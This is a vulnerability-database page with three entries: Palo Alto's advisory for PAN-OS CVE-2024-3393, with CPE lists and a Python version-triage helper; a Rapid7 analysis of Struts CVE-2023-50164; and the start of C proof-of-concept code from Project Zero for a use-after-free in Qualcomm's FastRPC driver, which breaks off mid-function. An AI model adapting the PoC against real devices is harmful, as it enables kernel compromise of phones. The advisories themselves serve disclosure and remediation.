cpe:2.3:o:paloaltonetworks:pan-os:10.2.8:h3:*:*:*:*:*:*

cpe:2.3:o:paloaltonetworks:pan-os:10.2.8:h2:*:*:*:*:*:*

cpe:2.3:o:paloaltonetworks:pan-os:10.2.8:h1:*:*:*:*:*:*

cpe:2.3:o:paloaltonetworks:pan-os:10.2.8:-:*:*:*:*:*:*

cpe:2.3:o:paloaltonetworks:pan-os:10.2:-:*:*:*:*:*:*

cpe:2.3:o:paloaltonetworks:pan-os:10.1.14:h6:*:*:*:*:*:*

cpe:2.3:o:paloaltonetworks:pan-os:10.1.14:h5:*:*:*:*:*:*

cpe:2.3:o:paloaltonetworks:pan-os:10.1.14:h4:*:*:*:*:*:*

cpe:2.3:o:paloaltonetworks:pan-os:10.1.14:h3:*:*:*:*:*:*

cpe:2.3:o:paloaltonetworks:pan-os:10.1.14:h2:*:*:*:*:*:*

cpe:2.3:o:paloaltonetworks:pan-os:10.1.14:h1:*:*:*:*:*:*

cpe:2.3:o:paloaltonetworks:pan-os:10.1.14:-:*:*:*:*:*:*

cpe:2.3:o:paloaltonetworks:pan-os:10.1:-:*:*:*:*:*:*


{
   uuid: "6608623d-c8c2-494f-a4a8-41a12a6a7cc0",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "PaloAlto - CVE-2024-3393 PAN-OS: Firewall Denial of Service (DoS) in DNS Security Using a Specially Crafted Packet",
   description: "# CVE-2024-3393 PAN-OS: Firewall Denial of Service (DoS) in DNS Security Using a Specially Crafted Packet\nRef: [https://security.paloaltonetworks.com/CVE-2024-3393](https://security.paloaltonetworks.com/CVE-2024-3393)\n\nA Denial of Service vulnerability in the DNS Security feature of Palo Alto Networks PAN-OS software allows an unauthenticated attacker to send a malicious packet through the data plane of the firewall that reboots the firewall. Repeated attempts to trigger this condition will cause the firewall to enter maintenance mode.\n\nSee the Solution section for additional fixes to commonly deployed maintenance releases.\n\nDNS Security logging must be enabled for this issue to affect PAN-OS software.\n\nPalo Alto Networks is aware of customers experiencing this denial of service (DoS) when their firewall blocks malicious DNS packets that trigger this issue.\n\nThis issue is fixed in PAN-OS 10.1.14-h8, PAN-OS 10.2.10-h12, PAN-OS 11.1.5, PAN-OS 11.2.3, and all later PAN-OS versions.\n\nNote: PAN-OS 11.0 reached the end of life (EOL) on November 17, 2024, so we do not intend to provide a fix for this release.\n\nPrisma Access customers using DNS Security with affected PAN-OS versions should apply one of the workarounds provided below. We will perform upgrades in two phases for impacted customers on the weekends of January 3rd and January 10th. 
You can request an expedited Prisma Access upgrade to the latest PAN-OS version by opening a [support case](https://support.paloaltonetworks.com/Support/Index).\n\nIn addition, to provide the most seamless upgrade path for our customers, we are making fixes available for other TAC-preferred and commonly deployed maintenance releases.\n\nRemember to revert the Log Severity settings once the fixes are applied.\n\nUntil we perform an upgrade of your Prisma Access tenant, you can disable DNS Security logging across all NGFWs in your tenant by opening a [support case](https://support.paloaltonetworks.com/Support/Index). If you would like to expedite the upgrade, please make a note of that in the support case.\n\ncpe:2.3:o:paloaltonetworks:pan-os:11.2.2:h2:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:11.2.2:h1:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:11.2.1:h1:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:11.2.1:-:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:11.2.0:h1:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:11.2.0:-:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:11.2:-:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:11.1.4:h9:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:11.1.4:h8:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:11.1.4:h7:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:11.1.4:h6:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:11.1.4:h5:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:11.1.4:h4:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:11.1.4:h3:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:11.1.4:h2:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:11.1.4:h1:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:11.1.4:-:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:11.1.3:h11:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:
paloaltonetworks:pan-os:11.1.3:h10:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:11.1.3:h9:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:11.1.3:h8:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:11.1.3:h7:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:11.1.3:h6:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:11.1.3:h5:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:11.1.3:h4:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:11.1.3:h3:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:11.1.3:h2:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:11.1.3:h1:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:11.1.3:-:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:11.1.2:h15:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:11.1.2:h14:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:11.1.2:h13:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:11.1.2:h12:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:11.1.2:h11:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:11.1.2:h10:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:11.1.2:h9:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:11.1.2:h8:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:11.1.2:h7:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:11.1.2:h6:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:11.1.2:h5:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:11.1.2:h4:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:11.1.2:h3:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:11.1.2:h2:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:11.1.2:h1:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:11.1.2:-:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:11.1.1:h2:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloalt
onetworks:pan-os:11.1.1:h1:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:11.1.1:-:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:11.1.0:h4:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:11.1.0:h3:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:11.1.0:h2:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:11.1.0:h1:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:11.1.0:-:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:11.1:-:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.2.10:h10:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.2.10:h9:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.2.10:h8:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.2.10:h7:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.2.10:h6:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.2.10:h5:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.2.10:h4:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.2.10:h3:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.2.10:h2:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.2.10:h1:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.2.10:-:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.2.9:h18:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.2.9:h17:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.2.9:h16:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.2.9:h15:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.2.9:h14:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.2.9:h13:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.2.9:h12:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.2.9:h11:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.2.9:h10:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:palo
altonetworks:pan-os:10.2.9:h9:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.2.9:h8:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.2.9:h7:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.2.9:h6:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.2.9:h5:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.2.9:h4:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.2.9:h3:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.2.9:h2:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.2.9:h1:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.2.9:-:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.2.8:h18:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.2.8:h17:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.2.8:h16:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.2.8:h15:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.2.8:h14:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.2.8:h13:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.2.8:h12:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.2.8:h11:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.2.8:h10:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.2.8:h9:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.2.8:h8:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.2.8:h7:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.2.8:h6:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.2.8:h5:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.2.8:h4:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.2.8:h3:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.2.8:h2:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.2.8:h1:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloalto
networks:pan-os:10.2.8:-:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.2:-:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.1.14:h6:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.1.14:h5:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.1.14:h4:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.1.14:h3:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.1.14:h2:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.1.14:h1:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.1.14:-:\\*:\\*:\\*:\\*:\\*:\\*\n\ncpe:2.3:o:paloaltonetworks:pan-os:10.1:-:\\*:\\*:\\*:\\*:\\*:\\*",
   description_format: "markdown",
   vulnerability: "CVE-2024-3393",
   creation_timestamp: "2024-12-27T08:59:02.439757+00:00",
   timestamp: "2024-12-27T08:59:47.544807+00:00",
   related_vulnerabilities: [
      "CVE-2024-3393",
   ],
   meta: [
      {
         tags: [
            "vulnerability:information=remediation",
         ],
      },
   ],
}

cve-2024-3393
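As an added example (not part of the advisory, the comment above, or any Palo Alto tooling), the Python helper below encodes the fixed releases and the DNS Security logging precondition stated in the advisory so that a list of PAN-OS version strings, or the CPE 2.3 identifiers listed above, can be triaged offline. It assumes version strings follow the `major.minor.maintenance[-hN]` form the advisory uses; the firewall names in the sample inventory are constructed. It is deliberately conservative: the advisory also says fixes were backported to other TAC-preferred maintenance releases, so a build on an older maintenance release that received such a backport is still reported as affected here and should be checked against the vendor's Solution section.

```python
"""Affected-version triage for CVE-2024-3393 (PAN-OS DNS Security DoS).

Encodes the fixed releases and the precondition stated in the advisory so
a fleet inventory of PAN-OS version strings, or the advisory's own CPE 2.3
identifiers, can be checked offline.
"""
import re

# First fixed release on each maintenance train, per the advisory.
# Tuple layout: (major, minor, maintenance, hotfix); hotfix 0 means no -hN.
FIRST_FIX = {
    (10, 1): (10, 1, 14, 8),   # PAN-OS 10.1.14-h8
    (10, 2): (10, 2, 10, 12),  # PAN-OS 10.2.10-h12
    (11, 1): (11, 1, 5, 0),    # PAN-OS 11.1.5
    (11, 2): (11, 2, 3, 0),    # PAN-OS 11.2.3
}
# 11.0 reached end of life on 2024-11-17; the vendor will not fix it.
EOL_TRAINS = {(11, 0)}

_VERSION_RE = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?(?:-h(\d+))?$")


def parse_version(text):
    """'10.2.10-h12' -> (10, 2, 10, 12); '11.1.5' -> (11, 1, 5, 0).

    A bare train such as '11.2' (the advisory's CPE list has these) parses
    as (11, 2, 0, 0), the oldest point on that train.
    """
    m = _VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"not a PAN-OS version string: {text!r}")
    major, minor, maint, hotfix = m.groups()
    return (int(major), int(minor), int(maint or 0), int(hotfix or 0))


def format_version(v):
    major, minor, maint, hotfix = v
    base = f"{major}.{minor}.{maint}"
    return f"{base}-h{hotfix}" if hotfix else base


def version_from_cpe(cpe):
    """Version tuple from a CPE 2.3 string of the form used in the advisory:
    cpe:2.3:o:paloaltonetworks:pan-os:10.2.9:h18:*:*:*:*:*:* -> (10, 2, 9, 18)
    The 'update' component carries the hotfix ('h18') or '-' for none.
    """
    parts = cpe.split(":")
    if len(parts) != 13 or parts[:5] != ["cpe", "2.3", "o", "paloaltonetworks", "pan-os"]:
        raise ValueError(f"not a PAN-OS CPE 2.3 string: {cpe!r}")
    version, update = parts[5], parts[6]
    if update.startswith("h") and update[1:].isdigit():
        version = f"{version}-{update}"
    return parse_version(version)


def assess(version, dns_security_logging=True):
    """Classify one firewall. 'status' is one of not_affected, fixed,
    affected, eol or unknown_train; 'note' carries the recommended action.

    Conservative by design: backports to other TAC-preferred maintenance
    releases are not in FIRST_FIX, so such a build is reported as affected
    until checked against the vendor's Solution section.
    """
    v = parse_version(version) if isinstance(version, str) else version
    train = v[:2]
    if not dns_security_logging:
        # The bug is only reachable when DNS Security logging is enabled;
        # disabling it is the advisory's interim workaround, not a fix.
        return {"status": "not_affected",
                "note": "DNS Security logging disabled; still upgrade, then re-enable"}
    if train in EOL_TRAINS:
        return {"status": "eol",
                "note": "11.0 is end of life with no fix; move to a supported train"}
    if train not in FIRST_FIX:
        return {"status": "unknown_train",
                "note": "train not covered by the advisory; check the vendor page"}
    fix = FIRST_FIX[train]
    if v >= fix:
        return {"status": "fixed", "note": f"at or above {format_version(fix)}"}
    return {"status": "affected",
            "note": f"upgrade to {format_version(fix)} or later on this train"}


def triage_cpes(cpes):
    """Status per CPE; cross-checks FIRST_FIX against the advisory's list."""
    return {cpe: assess(version_from_cpe(cpe))["status"] for cpe in cpes}


# A few of the CPE identifiers the advisory lists as affected.
ADVISORY_CPES = [
    "cpe:2.3:o:paloaltonetworks:pan-os:11.2.2:h2:*:*:*:*:*:*",
    "cpe:2.3:o:paloaltonetworks:pan-os:11.1.4:h9:*:*:*:*:*:*",
    "cpe:2.3:o:paloaltonetworks:pan-os:10.2.10:h10:*:*:*:*:*:*",
    "cpe:2.3:o:paloaltonetworks:pan-os:10.2.9:h18:*:*:*:*:*:*",
    "cpe:2.3:o:paloaltonetworks:pan-os:10.1.14:h6:*:*:*:*:*:*",
    "cpe:2.3:o:paloaltonetworks:pan-os:11.2:-:*:*:*:*:*:*",
]

if __name__ == "__main__":
    # Constructed inventory for illustration; not real devices.
    fleet = {"fw-edge-1": "10.2.10-h10", "fw-edge-2": "10.2.10-h12",
             "fw-dc-1": "11.0.4", "fw-lab-1": "11.1.4-h9"}
    for name, ver in fleet.items():
        r = assess(ver)
        print(f"{name:10} {ver:12} {r['status']:12} {r['note']}")
    assert set(triage_cpes(ADVISORY_CPES).values()) == {"affected"}
```

The comparison is a plain tuple compare, which is why a hotfix on an older maintenance release (10.2.9-h18) sorts below the first fixed build on the same train (10.2.10-h12) and is flagged, matching the advisory's CPE list. Remember that the advisory asks for the Log Severity settings to be reverted once the fix is applied, which a version check alone will not tell you.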

CVE-2023-50164 - Rapid7 analysis on cve-2023-50164
3 months ago by Alexandre Dulaunoy

Reference - https://attackerkb.com/topics/pe3CCtOE81/cve-2023-50164/rapid7-analysis

Apache Struts is a popular Java web application framework. On December 7, 2023 Apache published an advisory for CVE-2023-50164, a Struts parameter pollution vulnerability that potentially leads to arbitrary file uploads. An attacker with the ability to perform arbitrary file uploads is very likely to be able to leverage this and achieve remote code execution. According to the vendor, the following versions of Struts are affected:

  • Struts 2.0.0 – Struts 2.3.37 (End of Life)

  • Struts 2.5.0 – Struts 2.5.32

  • Struts 6.0.0 – Struts 6.3.0

Several technical analyses on the root cause of the vulnerability have already been done (here, here, and here). Notably, all current public analysis of the vulnerability demonstrates exploitation on a custom made demo web application.

There are currently no known production web applications that are exploitable, although this is likely to change as the vulnerability comes under more scrutiny from researchers, and given the popularity of the Struts framework in enterprise web applications. Several security firms have reported exploitation (here and here), but as of December 15, 2023, it is unclear if the activity being reported actually refers to successful exploitation (i.e., code execution) against one or more known vulnerable targets, or if this is merely highlighting exploit attempts with the existing public PoCs (all of which target a demo application) being sprayed opportunistically at indiscriminate targets.

However, exploitation of this vulnerability will be target-specific based on the differing target action’s endpoints, the naming convention of the expected uploaded file name, and any other target-specific restrictions that may need to be overcome.

Remediation

Vendors who develop applications that use Apache Struts should upgrade to Struts 2.5.33, Struts 6.3.0.2, or greater to remediate CVE-2023-50164.


{
   uuid: "a459b3c2-e2f0-467e-8fe5-e7c2b47a9fe3",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "CVE-2023-50164 - Rapid7 analysis",
   description: "Reference - [https://attackerkb.com/topics/pe3CCtOE81/cve-2023-50164/rapid7-analysis](https://attackerkb.com/topics/pe3CCtOE81/cve-2023-50164/rapid7-analysis)\n\n[Apache Struts](https://struts.apache.org/) is a popular Java web application framework. On December 7, 2023 Apache [published an advisory](https://www.openwall.com/lists/oss-security/2023/12/07/1) for [CVE-2023-50164](https://nvd.nist.gov/vuln/detail/CVE-2023-50164), a Struts parameter pollution vulnerability that potentially leads to arbitrary file uploads. An attacker with the ability to perform arbitrary file uploads is very likely to be able to leverage this and achieve remote code execution. According [to the vendor](https://cwiki.apache.org/confluence/display/WW/S2-066), the following versions of Struts are affected:\n\n*   Struts 2.0.0 – Struts 2.3.37 (End of Life)  \n    \n*   Struts 2.5.0 – Struts 2.5.32  \n    \n*   Struts 6.0.0 – Struts 6.3.0  \n    \n\nSeveral technical analyses on the root cause of the vulnerability have already been done ([here](https://trganda.github.io/notes/security/vulnerabilities/apache-struts/Apache-Struts-Remote-Code-Execution-Vulnerability-\\(-S2-066-CVE-2023-50164\\)), [here](https://xz.aliyun.com/t/13172), and [here](https://github.com/jakabakos/CVE-2023-50164-Apache-Struts-RCE)). Notably, all current public analysis of the vulnerability demonstrates exploitation on a custom made demo web application.\n\n**There are currently no known production web applications that are exploitable**, although this is likely to change as the vulnerability comes under more scrutiny from researchers, and given the popularity of the Struts framework in enterprise web applications. 
Several security firms have reported exploitation ([here](https://twitter.com/akamai_research/status/1735049812746137929) and [here](https://twitter.com/shadowserver/status/1734919288257974380)), but as of December 15, 2023, it is unclear if the activity being reported actually refers to successful exploitation (i.e., code execution) against one or more known vulnerable targets, or if this is merely highlighting exploit attempts with the existing public PoCs (all of which target a demo application) being sprayed opportunistically at indiscriminate targets.\n\nHowever, exploitation of this vulnerability will be target-specific based on the differing target action’s endpoints, the naming convention of the expected uploaded file name, and any other target-specific restrictions that may need to be overcome.\n\n# Remediation\n\nVendors who develop applications that use Apache Struts should upgrade to Struts 2.5.33, Struts 6.3.0.2, or greater to remediate CVE-2023-50164.",
   description_format: "markdown",
   vulnerability: "CVE-2023-50164",
   creation_timestamp: "2024-12-19T05:35:41.724032+00:00",
   timestamp: "2024-12-19T05:38:18.769241+00:00",
   related_vulnerabilities: [
      "CVE-2023-50164",
   ],
   meta: [
      {
         tags: [
            "vulnerability:information=remediation",
         ],
      },
      {
         ref: " https://attackerkb.com/topics/pe3CCtOE81/cve-2023-50164/rapid7-analysis",
      },
   ],
}

cve-2023-50164

FASTRPC_ATTR_KEEP_MAP logic bug allows fastrpc_internal_munmap_fd to concurrently free in-use mappings leading to UAF on cve-2024-49848
3 months ago by Alexandre Dulaunoy

Ref: https://project-zero.issues.chromium.org/issues/42451725

#include "adsprpc_shared.h"
#include <fcntl.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/wait.h>
#include <linux/dma-heap.h>
#include <sys/mman.h>
#include <errno.h>
#include <pthread.h>
#include <signal.h>

#define FASTRPC_MODE_UNSIGNED_MODULE 8
#define FASTRPC_STATIC_HANDLE_PROCESS_GROUP (1)
#define FASTRPC_STATIC_HANDLE_DSP_UTILITIES (2)
#define FASTRPC_STATIC_HANDLE_LISTENER (3)
#define FASTRPC_STATIC_HANDLE_CURRENT_PROCESS (4)
int dma_heap;
int adsprpc_fd;
// Open the FastRPC driver, bind it to a DSP domain, load the unsigned
// fastrpc shell into a DMA-BUF and ask the driver to spawn it as the
// remote process. Returns the driver fd, or -1 on any failure.
int create_and_init_adsprpc()
{
    int adsprpc_fd = open("/dev/adsprpc-smd",O_RDONLY);
    if(adsprpc_fd == -1) {
        printf("open: %m\n");
        return -1;
    }
    unsigned cid = 3; // remote domain id 3 = CDSP, matching the _3 suffix of the shell file below
    long ret = ioctl(adsprpc_fd,FASTRPC_IOCTL_GETINFO,&cid);
    int shell_fd = open("/data/local/tmp/fastrpc_shell_unsigned_3",O_RDONLY);
    if(shell_fd == -1) {
        printf("open shell: %m\n");
        return -1;
    }
    dma_heap = open("/dev/dma_heap/system",O_RDONLY);
    if(dma_heap == -1) {
        printf("open dma_heap: %m\n");
        return -1;
    }
    struct dma_heap_allocation_data heap_data = {
        .len = 0x131000,
        .fd_flags = O_RDWR,
    };
    ret = ioctl(dma_heap,DMA_HEAP_IOCTL_ALLOC,&heap_data);
    if( ret < 0 || heap_data.fd < 0)
    {
        printf("dma heap allocation fail: %ld %d %m\n",ret,heap_data.fd);
        return -1;
    }
    void* shell_file_dma = mmap(NULL,0x131000,PROT_READ | PROT_WRITE, MAP_SHARED,heap_data.fd,0);
    long length = read(shell_fd,shell_file_dma,0x131000);
    if(length <= 0) {
        printf("read: %ld %m\n",length);
        return -1;
    }
    close(shell_fd);
    struct fastrpc_ioctl_init_attrs init = {
        .init = {
            .file = shell_file_dma,
            .filefd = heap_data.fd,
            .filelen = length,
            .mem = 0,
            .flags = FASTRPC_INIT_CREATE,
        },
        .attrs = FASTRPC_MODE_UNSIGNED_MODULE
    };
    ret = ioctl(adsprpc_fd,FASTRPC_IOCTL_INIT_ATTRS,&init);
    if(ret < 0)
    {
        printf("init_attrs: %d %m\n",ret);
        return -1;
    }
    return adsprpc_fd;
}
pthread_barrier_t* barrier;
pthread_t tid_inv,tid_int;
unsigned long* value_loc;
struct dma_heap_allocation_data heap_data = {
    .len = 0x10000,
    .fd_flags = O_RDWR,
};
void handler(int signo, siginfo_t *info, void* context) {
    return;
}
sig_atomic_t jobid = 0;
long submit_job() {
    unsigned value = 255;
    unsigned out_values[256] = {0};
    struct fastrpc_ioctl_invoke_async ioctl_arg;
    remote_arg_t ra[2];
    ra[0].buf.pv = (void *)&value;
    ra[0].buf.len = sizeof(value);
    ra[1].buf.pv = (void *)(&out_values[1]);
    ra[1].buf.len = value * sizeof(uint32_t);
    ioctl_arg.inv.handle = FASTRPC_STATIC_HANDLE_CURRENT_PROCESS;
    ioctl_arg.inv.sc = REMOTE_SCALARS_MAKE(0, 1, 1);
    ioctl_arg.inv.pra = ra;
    ioctl_arg.fds = NULL;
    ioctl_arg.attrs = NULL;
    ioctl_arg.crc = NULL;
    ioctl_arg.perf_kernel = NULL;
    ioctl_arg.perf_dsp = NULL;
    ioctl_arg.job = NULL;
    ioctl_arg.job = malloc(sizeof(*ioctl_arg.job));
    ioctl_arg.job->isasyncjob = 1;
    ioctl_arg.job->jobid = jobid++;
    struct fastrpc_ioctl_invoke2 inv;
    inv.invparam = &ioctl_arg;
    inv.req = FASTRPC_INVOKE2_ASYNC;
    inv.size = sizeof(struct fastrpc_ioctl_invoke_async);

